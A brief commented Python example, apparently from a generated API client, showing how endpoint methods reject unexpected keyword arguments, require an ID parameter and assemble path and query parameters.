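# pattern (names below are hypothetical, not part of this client):
#
#     def call_endpoint(required_id, **kwargs):
#         allowed = {'start_date', 'end_date', 'stat'}
#         for key in kwargs:
#             if key not in allowed:
#                 raise TypeError("Got an unexpected keyword argument '%s'" % key)
#         if required_id is None:
#             raise ValueError("Missing the required parameter `required_id`")
#         path_params = {'required_id': required_id}
#         query_params = [(k, v) for k, v in kwargs.items()]
#         # the real methods hand these to self.api_client.call_api(...)
#         return path_params, query_params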